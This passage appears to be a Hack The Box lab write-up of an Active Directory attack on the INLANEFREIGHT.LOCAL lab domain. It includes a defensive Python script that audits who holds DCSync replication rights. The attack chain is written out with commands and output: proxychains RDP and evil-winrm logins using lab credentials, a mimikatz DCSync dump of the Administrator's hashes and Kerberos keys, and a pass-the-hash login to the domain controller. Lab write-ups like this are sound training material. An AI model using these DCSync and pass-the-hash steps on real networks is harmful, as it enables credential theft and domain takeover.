ObjectAceFlags : ObjectAceTypePresent
ObjectAceType : 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength : 56
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 256
SecurityIdentifier : S-1-5-21-2270287766-1317258649-2146029398-4607
AceType : AccessAllowedObject
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None
ObjectDN : DC=INLANEFREIGHT,DC=LOCAL
ObjectSID : S-1-5-21-2270287766-1317258649-2146029398
ActiveDirectoryRights : ExtendedRight
ObjectAceFlags : ObjectAceTypePresent
ObjectAceType : 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength : 56
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 256
SecurityIdentifier : S-1-5-21-2270287766-1317258649-2146029398-4607
AceType : AccessAllowedObject
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None
Checking the three ObjectAceType GUIDs online shows that they are the replication extended rights that enable a DCSync attack:
- 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2 → DS-Replication-Get-Changes (Replicating Directory Changes)
- 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2 → DS-Replication-Get-Changes-All (Replicating Directory Changes All)
- 89e95b76-444d-4c62-991a-0facbeda640c → DS-Replication-Get-Changes-In-Filtered-Set
tpetty holds Replicating Directory Changes + Replicating Directory Changes All (as ExtendedRight ACEs on the domain object), which is exactly what DCSync needs.
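As an added example (Python, not part of the original writeup): a small audit that parses Get-DomainObjectACL output in the format shown above, resolves those three GUIDs, and reports any principal outside an allow-list that can DCSync. The allow-list of expected holders is an assumption of the example, and the ACE listing is constructed from the writeup's values.

```python
import re

# The three extended-right GUIDs from the PowerView output above, mapped to the
# schema names they resolve to (well-known constants from the AD schema).
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
NULL_GUID = "00000000-0000-0000-0000-000000000000"

# Principals expected to hold replication rights on the domain head. The allow-list
# is an assumption for this example; the domain SID is the one shown in the writeup.
DOMAIN_SID = "S-1-5-21-2270287766-1317258649-2146029398"
EXPECTED_HOLDERS = {"S-1-5-32-544", DOMAIN_SID + "-516"}   # BUILTIN\Administrators, Domain Controllers

# Constructed sample in the format of the Get-DomainObjectACL output above:
# tpetty's three ACEs (RID 4607) plus one for the Domain Controllers group.
ACL_OUTPUT = """
ObjectDN : DC=INLANEFREIGHT,DC=LOCAL
ActiveDirectoryRights : ExtendedRight
ObjectAceType : 89e95b76-444d-4c62-991a-0facbeda640c
AceQualifier : AccessAllowed
SecurityIdentifier : S-1-5-21-2270287766-1317258649-2146029398-4607
ObjectDN : DC=INLANEFREIGHT,DC=LOCAL
ActiveDirectoryRights : ExtendedRight
ObjectAceType : 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2
AceQualifier : AccessAllowed
SecurityIdentifier : S-1-5-21-2270287766-1317258649-2146029398-4607
ObjectDN : DC=INLANEFREIGHT,DC=LOCAL
ActiveDirectoryRights : ExtendedRight
ObjectAceType : 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2
AceQualifier : AccessAllowed
SecurityIdentifier : S-1-5-21-2270287766-1317258649-2146029398-4607
ObjectDN : DC=INLANEFREIGHT,DC=LOCAL
ActiveDirectoryRights : ExtendedRight
ObjectAceType : 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2
AceQualifier : AccessAllowed
SecurityIdentifier : S-1-5-21-2270287766-1317258649-2146029398-516
"""

def parse_aces(text):
    """Split the 'Key : Value' listing into one dict per ACE (each ACE starts at ObjectDN)."""
    aces, current = [], None
    for line in text.splitlines():
        m = re.match(r"^\s*(\w+)\s*:\s*(.*?)\s*$", line)
        if not m:
            continue
        key, value = m.groups()
        if key == "ObjectDN":
            current = {}
            aces.append(current)
        if current is not None:
            current[key] = value
    return aces

def find_dcsync_holders(aces, expected=EXPECTED_HOLDERS):
    """Report SIDs outside the allow-list holding replication rights on a domain object.
    Full DCSync needs Get-Changes plus Get-Changes-All; GenericAll/WriteDacl holders
    could grant themselves the same rights and need a separate check."""
    rights = {}
    for ace in aces:
        if ace.get("AceQualifier") != "AccessAllowed" or "ExtendedRight" not in ace.get("ActiveDirectoryRights", ""):
            continue
        guid = ace.get("ObjectAceType", "").lower()
        if guid in ("", NULL_GUID):
            names = set(REPLICATION_RIGHTS.values())   # unscoped ExtendedRight covers every extended right
        elif guid in REPLICATION_RIGHTS:
            names = {REPLICATION_RIGHTS[guid]}
        else:
            continue
        rights.setdefault(ace["SecurityIdentifier"], set()).update(names)
    findings = []
    for sid, names in rights.items():
        if sid in expected:
            continue
        full = {"DS-Replication-Get-Changes", "DS-Replication-Get-Changes-All"} <= names
        findings.append({"sid": sid, "rights": sorted(names), "can_dcsync": full})
    return findings

if __name__ == "__main__":
    for f in find_dcsync_holders(parse_aces(ACL_OUTPUT)):
        print(f"[!] {f['sid']} holds {', '.join(f['rights'])} (DCSync capable: {f['can_dcsync']})")
```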
I connect to the host via RDP:
┌─[eu-academy-1]─[10.10.14.30]─[htb-ac-2510340@htb-hnkzcchgmi]─[~]
└──╼ [★]$ proxychains xfreerdp /v:172.16.6.50 /u:svc_sql /p:lucky7 /size:600x550
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.6.50:3389 ... OK
Then I ran runas /user:INLANEFREIGHT\tpetty powershell.exe, which opens another PowerShell window running as tpetty.
To further enumerate I need mimikatz on the host, so I decided to connect to the host via evil-winrm to make it easy to upload scripts. I uploaded mimikatz via evil-winrm into the tpetty directory for easy access:
proxychains evil-winrm -i 172.16.6.50 -u svc_sql -p lucky7
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.6.50:5985 ... OK
*Evil-WinRM* PS C:\Users\svc_sql.INLANEFREIGHT\Documents> cd C:\
*Evil-WinRM* PS C:\> cd Users
*Evil-WinRM* PS C:\Users> cd tpetty
Then I run mimikatz in the PowerShell window running as tpetty:
PS C:\Users\tpetty> .\mimikatz.exe
.#####. mimikatz 2.2.0 (x64) #18362 Feb 29 2020 11:13:36
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
mimikatz #
Once mimikatz is running, you should see mimikatz # then run privilege::debug
mimikatz # privilege::debug
ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061
Then run lsadump::dcsync /domain:INLANEFREIGHT.LOCAL /user:INLANEFREIGHT\administrator to get the Domain Admin hash. The privilege::debug error above does not matter here: DCSync does not read LSASS but asks the DC to replicate the account, using the replication rights granted to tpetty in the directory.
mimikatz # lsadump::dcsync /domain:INLANEFREIGHT.LOCAL /user:INLANEFREIGHT\administrator
[DC] 'INLANEFREIGHT.LOCAL' will be the domain
[DC] 'DC01.INLANEFREIGHT.LOCAL' will be the DC server
[DC] 'INLANEFREIGHT\administrator' will be the user account
Object RDN : Administrator
** SAM ACCOUNT **
SAM Username : Administrator
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000200 ( NORMAL_ACCOUNT )
Account expiration :
Password last change : 4/11/2022 9:24:49 PM
Object Security ID : S-1-5-21-2270287766-1317258649-2146029398-500
Object Relative ID : 500
Credentials:
Hash NTLM: 27dedb1dab4d8545c6e1c66fba077da0
ntlm- 0: 27dedb1dab4d8545c6e1c66fba077da0
ntlm- 1: bdaffbfe64f1fc646a3353be1c2c3c99
lm - 0: 757743529af55e110994f3c7e3710fc9
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : b8bcb44123b3cc3bff20c663f1e0b94d
* Primary:Kerberos-Newer-Keys *
Default Salt : INLANEFREIGHT.LOCALAdministrator
Default Iterations : 4096
Credentials
aes256_hmac (4096) : a76102a5617bffb1ea84ba0052767992823fd414697e81151f7de21bb41b1857
aes128_hmac (4096) : 69e27df2550c5c270eca1d8ce5c46230
des_cbc_md5 (4096) : c2d9c892f2e6f2dc
OldCredentials
aes256_hmac (4096) : 51d2b5ce03d6ea2e75e69050f32b927d0e602c2806dcb0d1dd0aacdda619a510
aes128_hmac (4096) : b93da9262f5ce0ed724ce0177366bc8a
des_cbc_md5 (4096) : 0876d604a7087cf7
OlderCredentials
aes256_hmac (4096) : 23cbc0dad348bebcbdbb4c82e9b23af299e8b56de358bafe24f2235f34497e4a
aes128_hmac (4096) : e35eb565af30c8ed79df5d8875508df6
des_cbc_md5 (4096) : 4904021983252cd5
* Primary:Kerberos *
Default Salt : INLANEFREIGHT.LOCALAdministrator
Credentials
des_cbc_md5 : c2d9c892f2e6f2dc
OldCredentials
des_cbc_md5 : 0876d604a7087cf7
Now we have the Domain Admin hash. I tried cracking it but had no luck, so I decided to pass the hash with evil-winrm to log in to the DC:
┌─[eu-academy-1]─[10.10.14.30]─[htb-ac-2510340@htb-hnkzcchgmi]─[~]
└──╼ [★]$ proxychains evil-winrm -i 172.16.6.3 -u Administrator -H 27dedb1dab4d8545c6e1c66fba077da0
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.6.3:5985 ... OK
PS C:\Users\Administrator\Desktop> whoami
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.6.3:5985 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.6.3:5985 ... OK
inlanefreight\administrator
Game Over.... Domain admin compromised!!!!!!